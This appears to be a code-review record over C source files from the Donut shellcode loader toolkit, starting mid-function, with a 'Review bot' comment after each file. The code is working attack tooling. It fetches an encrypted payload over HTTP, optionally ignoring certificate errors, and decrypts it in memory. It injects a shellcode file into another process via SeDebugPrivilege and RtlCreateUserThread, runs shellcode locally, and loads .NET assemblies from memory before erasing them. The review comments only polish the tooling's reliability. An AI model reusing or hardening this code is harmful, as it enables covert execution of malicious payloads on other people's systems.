42 PSYSCALL_LIST syscall_list;
43
44 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
45
46 // default flags for HTTP client
47 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
48 INTERNET_FLAG_DONT_CACHE |
49 INTERNET_FLAG_NO_UI |
50 INTERNET_FLAG_PRAGMA_NOCACHE |
51 INTERNET_FLAG_NO_AUTO_REDIRECT;
52
53 Memset(&uc, 0, sizeof(uc));
54
55 uc.dwStructSize = sizeof(uc);
56
57 uc.lpszHostName = host;
58 uc.dwHostNameLength = sizeof(host);
59
60 uc.lpszUrlPath = file;
61 uc.dwUrlPathLength = sizeof(file);
62
63 uc.lpszUserName = username;
64 uc.dwUserNameLength = sizeof(username);
65
66 uc.lpszPassword = password;
67 uc.dwPasswordLength = sizeof(password);
68
69 if(!inst->api.InternetCrackUrl(
70 inst->server, 0, ICU_DECODE, &uc)) {
71 DPRINT("InternetCrackUrl");
72 return FALSE;
73 }
74
75 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
76
77 // if secure connection, update the flags
78 if(bSecure) {
79 flags |= INTERNET_FLAG_SECURE;
80 // ignore invalid certificates?
81 if(bIgnore) {
82 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
83 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
84 }
85 }
86
87 hin = inst->api.InternetOpen(
88 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
89 NULL, NULL, 0);
90
91 if(hin == NULL) return FALSE;
92
93 DPRINT("Creating %s connection for %s",
94 bSecure ? "HTTPS" : "HTTP", host);
95
96 con = inst->api.InternetConnect(
97 hin, host, uc.nPort, NULL, NULL,
98 INTERNET_SERVICE_HTTP, 0, 0);
99
100 if(con != NULL) {
101 if(uc.dwUrlPathLength == 0) {
102 file[0] = '/';
103 file[1] = '\0';
104 }
105 DPRINT("Opening GET request for %s", file);
106
107 req = inst->api.HttpOpenRequest(
108 con, NULL, file, NULL,
109 NULL, NULL, flags, 0);
110
111 if(req != NULL) {
112
113 // see if we should ignore invalid certificates for this request
114 if(bSecure) {
115 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
116 n = sizeof (s);
117
118 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
119 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
120 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
121 SECURITY_FLAG_IGNORE_WRONG_USAGE |
122 SECURITY_FLAG_IGNORE_REVOCATION;
123
124 DPRINT("Setting option to ignore invalid certificates");
125
126 inst->api.InternetSetOption(
127 req,
128 INTERNET_OPTION_SECURITY_FLAGS,
129 &s,
130 sizeof(s));
131 }
132 }
133 // set username
134 if(uc.dwUserNameLength != 0) {
135 DPRINT("Using username : %s", uc.lpszUserName);
136
137 bResult = inst->api.InternetSetOption(
138 req, INTERNET_OPTION_USERNAME,
139 uc.lpszUserName, uc.dwUserNameLength);
140
141 if(!bResult) {
142 DPRINT("Error with InternetSetOption(INTERNET_OPTION_USERNAME)");
143 }
144 }
145
146 // set password
147 if(uc.dwPasswordLength != 0) {
148 DPRINT("Using password : %s", uc.lpszPassword);
149 bResult = inst->api.InternetSetOption(
150 req, INTERNET_OPTION_PASSWORD,
151 uc.lpszPassword, uc.dwPasswordLength);
152
153 if(!bResult) {
154 DPRINT("Error with InternetSetOption(INTERNET_OPTION_PASSWORD)");
155 }
156 }
157
158 DPRINT("Sending request");
159
160 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
161 len = sizeof(DWORD);
162 code = 0;
163 DPRINT("Querying status code");
164
165 if(inst->api.HttpQueryInfo(
166 req,
167 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
168 &code, &len, 0))
169 {
170 DPRINT("Code is %i", code);
171
172 if(code == HTTP_STATUS_OK) {
173 // try to query the content length
174 len = sizeof(SIZE_T);
175 inlen = 0;
176
177 res = inst->api.HttpQueryInfo(
178 req,
179 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
180 &inlen, &len, 0);
181
182 // if there's no content length
183 if(!res) {
184 DPRINT("Error reading content length.");
185 if(inst->api.GetLastError() == ERROR_HTTP_HEADER_NOT_FOUND) {
186 DPRINT("Retrieving data in chunked mode.");
187 // perform a chunked read
188 for(inlen=0;;) {
189 // determine what's available
190 res = inst->api.InternetQueryDataAvailable(req, &chunklen, 0, 0);
191
192 // if call fails or nothing to read, end loop
193 if(!res || chunklen == 0) {
194 break;
195 }
196 if(inbuf == NULL) {
197 // allocate buffer for chunk to be read
198 inbuf = inst->api.HeapAlloc(
199 inst->api.GetProcessHeap(),
200 HEAP_NO_SERIALIZE, chunklen);
201 if(inbuf == NULL) {
202 DPRINT("HeapAlloc");
203 break;
204 }
205 } else {
206 // expand size of buffer
207 inbuf = inst->api.HeapReAlloc(
208 inst->api.GetProcessHeap(),
209 HEAP_NO_SERIALIZE,
210 inbuf, inlen + chunklen);
211
212 if(inbuf == NULL) {
213 DPRINT("HeapReAlloc");
214 break;
215 }
216 }
217 // read chunk
218 res = inst->api.InternetReadFile(
219 req, inbuf+inlen, chunklen, &rd);
220
221 inlen += chunklen;
222 }
223 }
224 } else {
225 DPRINT("Retrieving %ld bytes of data in single read.", inlen);
226 if(inlen != 0) {
227 inbuf = inst->api.HeapAlloc(
228 inst->api.GetProcessHeap(),
229 HEAP_NO_SERIALIZE, inlen);
230
231 if(inbuf != NULL) {
232 rd = 0;
233 DPRINT("Reading %i bytes...", inlen);
234 bResult = inst->api.InternetReadFile(
235 req, inbuf, inlen, &rd);
236 } else {
237 DPRINT("HeapAlloc");
238 }
239 }
240 }
241 } else {
242 DPRINT("HTTP response was %i", code);
243 }
244 } else {
245 DPRINT("HttpQueryInfo");
246 }
247 } else {
248 DPRINT("HttpSendRequest");
249 }
250
251 if(inbuf != NULL && inlen != 0) {
252 DPRINT("Copying %i bytes to VM", inlen);
253 rs = inlen;
254 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&inst->module.p, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
255
256 if(NT_SUCCESS(status)) {
257 Memcpy(inst->module.p, inbuf, inlen);
258 bResult = TRUE;
259 } else {
260 bResult = FALSE;
261 }
262 Memset(inbuf, 0, inlen);
263
264 inst->api.HeapFree(
265 inst->api.GetProcessHeap(),
266 HEAP_NO_SERIALIZE, inbuf);
267 }
268 DPRINT("Closing request");
269 inst->api.InternetCloseHandle(req);
270 }
271 DPRINT("Closing connection handle");
272 inst->api.InternetCloseHandle(con);
273 }
274 DPRINT("Closing internet handle");
275 inst->api.InternetCloseHandle(hin);
276
277 if(bResult && inst->entropy == DONUT_ENTROPY_DEFAULT) {
278 PDONUT_MODULE mod = inst->module.p;
279
280 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
281
282 donut_decrypt(inst->mod_key.mk,
283 inst->mod_key.ctr,
284 mod,
285 inst->mod_len);
286
287 DPRINT("Generating hash to verify decryption");
288 ULONG64 mac = maru(inst->sig, inst->iv);
289
290 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
291
292 if(mac != mod->mac) {
293 DPRINT("Decryption failed");
294 return FALSE;
295 }
296 }
297 return bResult;
298 }
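Review bot: The number of bytes actually received is never compared with `inst->mod_len`, yet `donut_decrypt` runs over `inst->mod_len` bytes of a region that was allocated and filled with only `inlen` bytes. A short or truncated response would therefore let the decrypt pass run past the copied data. A check such as `if(bResult && inlen < inst->mod_len) bResult = FALSE;` ahead of the decrypt block would bound it, assuming `mod_len` is the expected module size. The chunked loop has a related accounting error: it ignores the result of `InternetReadFile` and advances with `inlen += chunklen` rather than `inlen += rd`, so `inlen` can overstate what was read. Separately, `DPRINT("Using password : %s", uc.lpszPassword)` writes the URL credential to debug output and should omit the value.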
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 typedef struct _CLIENT_ID {
36 PVOID UniqueProcess;
37 PVOID UniqueThread;
38 } CLIENT_ID, *PCLIENT_ID;
39
40 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
41 IN HANDLE ProcessHandle,
42 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
43 IN BOOLEAN CreateSuspended,
44 IN ULONG StackZeroBits,
45 IN OUT PULONG StackReserved,
46 IN OUT PULONG StackCommit,
47 IN PVOID StartAddress,
48 IN PVOID StartParameter OPTIONAL,
49 OUT PHANDLE ThreadHandle,
50 OUT PCLIENT_ID ClientID);
51
52 BOOL EnablePrivilege(PCHAR szPrivilege){
53 HANDLE hToken;
54 BOOL bResult;
55 LUID luid;
56 TOKEN_PRIVILEGES tp;
57
58 // open token for current process
59 bResult = OpenProcessToken(GetCurrentProcess(),
60 TOKEN_ADJUST_PRIVILEGES, &hToken);
61
62 if(!bResult) return FALSE;
63
64 // lookup privilege
65 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
66 if(bResult){
67 tp.PrivilegeCount = 1;
68 tp.Privileges[0].Luid = luid;
69 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
70
71 // adjust token
72 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
73 }
74 CloseHandle(hToken);
75 return bResult;
76 }
77
78 // display error message for last error code
79 VOID xstrerror (PCHAR fmt, ...){
80 PCHAR error=NULL;
81 va_list arglist;
82 CHAR buffer[1024];
83 DWORD dwError=GetLastError();
84
85 va_start(arglist, fmt);
86 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
87 va_end (arglist);
88
89 if (FormatMessage (
90 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
91 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
92 (LPSTR)&error, 0, NULL))
93 {
94 printf(" [ %s : %s\n", buffer, error);
95 LocalFree (error);
96 } else {
97 printf(" [ %s error : %08lX\n", buffer, dwError);
98 }
99 }
100
101 DWORD name2pid(PCHAR procName){
102 HANDLE hSnap;
103 PROCESSENTRY32 pe32;
104 DWORD pid=0;
105
106 // create snapshot of system
107 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
108 if(hSnap == INVALID_HANDLE_VALUE) return 0;
109
110 pe32.dwSize = sizeof(PROCESSENTRY32);
111
112 // get first process
113 if(Process32First(hSnap, &pe32)){
114 do {
115 if(!lstrcmpi(pe32.szExeFile, procName)){
116 pid=pe32.th32ProcessID;
117 break;
118 }
119 } while(Process32Next(hSnap, &pe32));
120 }
121 CloseHandle(hSnap);
122 return pid;
123 }
124
125 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
126 SIZE_T wr;
127 HANDLE hp,ht;
128 LPVOID cs;
129 RtlCreateUserThread_t pRtlCreateUserThread;
130 HMODULE hn;
131 CLIENT_ID cid;
132 NTSTATUS nt=~0UL;
133 DWORD t;
134
135 // 1. resolve API address
136 hn = GetModuleHandle("ntdll.dll");
137 pRtlCreateUserThread=(RtlCreateUserThread_t)
138 GetProcAddress(hn, "RtlCreateUserThread");
139
140 printf(" [ opening process %li\n", id);
141 // 2. open the target process
142 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
143
144 if(hp == NULL) return FALSE;
145
146 // 3. allocate executable-read-write (XRW) memory for payload
147 printf(" [ allocating memory for payload.\n");
148 cs=VirtualAllocEx(hp, NULL, codeLen,
149 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
150
151 printf(" [ writing code to %p.\n", cs);
152 // 4. copy the payload to remote memory
153 WriteProcessMemory(hp, cs, code, codeLen, &wr);
154 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
155
156 printf(" [ press any key to continue.\n");
157 getchar();
158
159 // 5. execute payload in remote process
160 printf(" [ creating new thread.\n");
161 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
162 NULL, cs, NULL, &ht, &cid);
163
164 //AttachConsole(id);
165
166 printf(" [ nt status is %lx\n", nt);
167 WaitForSingleObject(ht, INFINITE);
168
169 // 6. close remote thread handle
170 CloseHandle(ht);
171
172 // 7. free remote memory
173 printf(" [ freeing memory.\n");
174 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
175
176 // 8. close remote process handle
177 CloseHandle(hp);
178 return nt == 0; // STATUS_SUCCESS
179 }
180
181 DWORD getdata(PCHAR path, LPVOID *data){
182 HANDLE hf;
183 DWORD len,rd=0;
184
185 // 1. open the file
186 hf=CreateFile(path, GENERIC_READ, 0, 0,
187 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
188
189 if(hf!=INVALID_HANDLE_VALUE){
190 // get file size
191 len=GetFileSize(hf, 0);
192 // allocate memory
193 *data=malloc(len + 16);
194 // read file contents into memory
195 ReadFile(hf, *data, len, &rd, 0);
196 CloseHandle(hf);
197 }
198 return rd;
199 }
200
201 int main(int argc, char *argv[]){
202 LPVOID code;
203 SIZE_T code_len;
204 DWORD pid;
205
206 if (argc != 3){
207 printf("\n [ usage: inject <process id | process name> <loader.bin>\n");
208 return 0;
209 }
210
211 if(!EnablePrivilege(SE_DEBUG_NAME)) {
212 printf(" [ cannot enable SeDebugPrivilege.\n");
213 }
214
215 // get pid
216 pid=atoi(argv[1]);
217 if(pid==0) pid=name2pid(argv[1]);
218
219 if(pid==0) {
220 printf(" [ unable to obtain process id.\n");
221 return 0;
222 }
223 // pic
224 code_len = getdata(argv[2], &code);
225 if(code_len == 0) {
226 printf(" [ unable to read payload.\n");
227 return 0;
228 }
229 injectPIC(pid, code, code_len);
230 free(code);
231 return 0;
232 }
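Review bot: In `injectPIC`, `ht` is declared without an initial value and is passed to `WaitForSingleObject` and `CloseHandle` even when `pRtlCreateUserThread` returns a failure status, so the failure path operates on an indeterminate handle. Declaring `HANDLE hp, ht = NULL;` and guarding the wait with `if (nt == 0) { WaitForSingleObject(ht, INFINITE); CloseHandle(ht); }` removes that. The results of `GetProcAddress` and `VirtualAllocEx` are likewise used unchecked, so a NULL `pRtlCreateUserThread` would be called and a NULL `cs` would be passed on to `WriteProcessMemory`. `getdata` does not check the results of `malloc` or `GetFileSize` either, and the identical `getdata` in the following file section has the same gap.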
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 // display error message for last error code
36 VOID xstrerror (PCHAR fmt, ...){
37 PCHAR error=NULL;
38 va_list arglist;
39 CHAR buffer[1024];
40 DWORD dwError=GetLastError();
41
42 va_start(arglist, fmt);
43 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
44 va_end (arglist);
45
46 if (FormatMessage (
47 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
48 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
49 (LPSTR)&error, 0, NULL))
50 {
51 printf(" [ %s : %s\n", buffer, error);
52 LocalFree (error);
53 } else {
54 printf(" [ %s error : %08lX\n", buffer, dwError);
55 }
56 }
57
58 BOOL injectPIC(LPVOID code, DWORD codeLen) {
59 LPVOID cs;
60 DWORD t;
61
62 // 1. allocate read-write (RW) memory for payload
63 printf(" [ allocating memory for payload.\n");
64 cs=VirtualAlloc(NULL, codeLen,
65 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
66
67 if (cs == NULL) {
68 printf(" [ unable to allocate memory.\n");
69 return FALSE;
70 }
71
72 printf(" [ writing code to 0x%p.\n", cs);
73 // 2. copy the payload to remote memory
74 memcpy(cs, code, codeLen);
75 //WriteProcessMemory(hp, cs, code, codeLen, &wr);
76 VirtualProtect(cs, codeLen, PAGE_EXECUTE_READ, &t);
77
78 printf(" [ press any key to continue.\n");
79 getchar();
80
81 // 3. execute payload in remote process
82 printf(" [ jumping to shellcode.\n");
83 void (*function)();
84 function = (void (*)())cs;
85 function();
86
87 return TRUE;
88 }
89
90 DWORD getdata(PCHAR path, LPVOID *data){
91 HANDLE hf;
92 DWORD len,rd=0;
93
94 // 1. open the file
95 hf=CreateFile(path, GENERIC_READ, 0, 0,
96 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
97
98 if(hf!=INVALID_HANDLE_VALUE){
99 // get file size
100 len=GetFileSize(hf, 0);
101 // allocate memory
102 *data=malloc(len + 16);
103 // read file contents into memory
104 ReadFile(hf, *data, len, &rd, 0);
105 CloseHandle(hf);
106 }
107 return rd;
108 }
109
110 int main(int argc, char *argv[]){
111 LPVOID code;
112 SIZE_T code_len;
113
114 if (argc != 2){
115 printf("\n [ usage: inject <loader.bin>\n");
116 return 0;
117 }
118
119 // pic
120 code_len = getdata(argv[1], &code);
121 if(code_len == 0) {
122 printf(" [ unable to read payload.\n");
123 return 0;
124 }
125 injectPIC(code, code_len);
126 free(code);
127 return 0;
128 }
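Review bot: The step comments in `injectPIC` do not describe what this local variant does: step 1 says read-write (RW) while the call passes `PAGE_EXECUTE_READWRITE`, and steps 2 and 3 still say "remote memory" and "remote process" although `memcpy` and the direct call through `function` run in the current process. I would reword them to `// 1. allocate read-write-execute (RWX) memory for payload`, `// 2. copy the payload into the local allocation` and `// 3. execute payload in the current process`. The return value of `VirtualProtect` is ignored, so a failed protection change leaves the region RWX with no message. `xstrerror` is defined in this section but not called in it, so it could report that failure.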
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
32 HRESULT hr = S_OK;
33 BSTR domain;
34 SAFEARRAYBOUND sab;
35 SAFEARRAY *sa;
36 DWORD i;
37 BOOL loaded=FALSE, loadable;
38 PBYTE p;
39 WCHAR buf[DONUT_MAX_NAME];
40
41 if(inst->api.CLRCreateInstance != NULL) {
42 DPRINT("CLRCreateInstance");
43
44 hr = inst->api.CLRCreateInstance(
45 (REFCLSID)&inst->xCLSID_CLRMetaHost,
46 (REFIID)&inst->xIID_ICLRMetaHost,
47 (LPVOID*)&pa->icmh);
48
49 if(SUCCEEDED(hr)) {
50 DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
51 ansi2unicode(inst, mod->runtime, buf);
52
53 hr = pa->icmh->lpVtbl->GetRuntime(
54 pa->icmh, buf,
55 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRRuntimeInfo::IsLoadable");
59 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
60
61 if(SUCCEEDED(hr) && loadable) {
62 DPRINT("ICLRRuntimeInfo::GetInterface");
63
64 hr = pa->icri->lpVtbl->GetInterface(
65 pa->icri,
66 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
67 (REFIID)&inst->xIID_ICorRuntimeHost,
68 (LPVOID)&pa->icrh);
69
70 DPRINT("HRESULT: %08lx", hr);
71 }
72 } else pa->icri = NULL;
73 } else pa->icmh = NULL;
74 }
75 // fall back on CorBindToRuntime when CLRCreateInstance isn't available
76 // or for example when the above code failed.
77 if(FAILED(hr) || inst->api.CLRCreateInstance == NULL) {
78 DPRINT("Trying CorBindToRuntime");
79
80 hr = inst->api.CorBindToRuntime(
81 NULL, // load whatever's available
82 NULL, // load workstation build
83 &inst->xCLSID_CorRuntimeHost,
84 &inst->xIID_ICorRuntimeHost,
85 (LPVOID*)&pa->icrh);
86
87 DPRINT("HRESULT: %08lx", hr);
88 }
89
90 if(FAILED(hr)) {
91 pa->icrh = NULL;
92 return FALSE;
93 }
94 DPRINT("ICorRuntimeHost::Start");
95
96 hr = pa->icrh->lpVtbl->Start(pa->icrh);
97
98 if(SUCCEEDED(hr)) {
99 // if no domain name specified
100 if(mod->domain[0] == 0) {
101 DPRINT("ICorRuntimeHost::GetDefaultDomain()");
102 // use the default
103 hr = pa->icrh->lpVtbl->GetDefaultDomain(pa->icrh, &pa->iu);
104 } else {
105 // else create a new domain using the name
106 DPRINT("Domain is %s", mod->domain);
107 ansi2unicode(inst, mod->domain, buf);
108 domain = inst->api.SysAllocString(buf);
109
110 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", buf);
111
112 hr = pa->icrh->lpVtbl->CreateDomain(
113 pa->icrh, domain, NULL, &pa->iu);
114
115 inst->api.SysFreeString(domain);
116 }
117
118 if(SUCCEEDED(hr)) {
119 DPRINT("IUnknown::QueryInterface");
120
121 hr = pa->iu->lpVtbl->QueryInterface(
122 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
123
124 if(SUCCEEDED(hr)) {
125 sab.lLbound = 0;
126 sab.cElements = mod->len;
127 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
128
129 if(sa != NULL) {
130 DPRINT("Copying %" PRIi32 " bytes of assembly to safe array", mod->len);
131
132 for(i=0, p=sa->pvData; i<mod->len; i++) {
133 p[i] = mod->data[i];
134 }
135
136 DPRINT("AppDomain::Load_3");
137
138 hr = pa->ad->lpVtbl->Load_3(
139 pa->ad, sa, &pa->as);
140
141 loaded = hr == S_OK;
142
143 DPRINT("HRESULT : %08lx", hr);
144
145 DPRINT("Erasing assembly from memory");
146
147 for(i=0, p=sa->pvData; i<mod->len; i++) {
148 p[i] = mod->data[i] = 0;
149 }
150
151 DPRINT("SafeArrayDestroy");
152 inst->api.SafeArrayDestroy(sa);
153 }
154 }
155 }
156 }
157 return loaded;
158 }
159
160 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
161 SAFEARRAY *sav=NULL, *args=NULL;
162 VARIANT arg, ret, vtPsa, v1={0}, v2;
163 DWORD i;
164 HRESULT hr;
165 BSTR cls, method;
166 ULONG cnt;
167 OLECHAR str[1]={0};
168 LONG ucnt, lcnt;
169 WCHAR **argv, buf[DONUT_MAX_NAME+1];
170 int argc;
171
172 DPRINT("Type is %s",
173 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
174
175 // if this is a program
176 if(mod->type == DONUT_MODULE_NET_EXE) {
177 // get the entrypoint
178 DPRINT("MethodInfo::EntryPoint");
179 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
180
181 if(SUCCEEDED(hr)) {
182 // get the parameters for entrypoint
183 DPRINT("MethodInfo::GetParameters");
184 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &args);
185
186 if(SUCCEEDED(hr)) {
187 DPRINT("SafeArrayGetLBound");
188 hr = inst->api.SafeArrayGetLBound(args, 1, &lcnt);
189
190 DPRINT("SafeArrayGetUBound");
191 hr = inst->api.SafeArrayGetUBound(args, 1, &ucnt);
192 cnt = ucnt - lcnt + 1;
193 DPRINT("Number of parameters for entrypoint : %i", cnt);
194
195 // does Main require string[] args?
196 if(cnt != 0) {
197 // create a 1 dimensional array for Main parameters
198 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
199 // if user specified their own parameters, add to string array
200 if(mod->args[0] != 0) {
201 ansi2unicode(inst, mod->args, buf);
202 argv = inst->api.CommandLineToArgvW(buf, &argc);
203 // create 1 dimensional array for strings[] args
204 vtPsa.vt = (VT_ARRAY | VT_BSTR);
205 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, argc);
206
207 // add each string parameter
208 for(i=0; i<argc; i++) {
209 DPRINT("Adding \"%ws\" as parameter %i", argv[i], (i + 1));
210 inst->api.SafeArrayPutElement(vtPsa.parray,
211 &i, inst->api.SysAllocString(argv[i]));
212 }
213 } else {
214 DPRINT("Adding empty string for invoke_3");
215 // add empty string to make it work
216 // create 1 dimensional array for strings[] args
217 vtPsa.vt = (VT_ARRAY | VT_BSTR);
218 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
219
220 i=0;
221 inst->api.SafeArrayPutElement(vtPsa.parray,
222 &i, inst->api.SysAllocString(str));
223 }
224 // add string array to list of parameters
225 i=0;
226 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
227 }
228 v1.vt = VT_NULL;
229 v1.plVal = NULL;
230
231 DPRINT("MethodInfo::Invoke_3()\n");
232
233 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
234
235 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
236 hr, SUCCEEDED(hr) ? "Success" : "Failed");
237
238 if(sav != NULL) {
239 inst->api.SafeArrayDestroy(vtPsa.parray);
240 inst->api.SafeArrayDestroy(sav);
241 }
242 }
243 } else pa->mi = NULL;
244 } else {
245 ansi2unicode(inst, mod->cls, buf);
246 cls = inst->api.SysAllocString(buf);
247 if(cls == NULL) return FALSE;
248 DPRINT("Class: SysAllocString(\"%ws\")", buf);
249
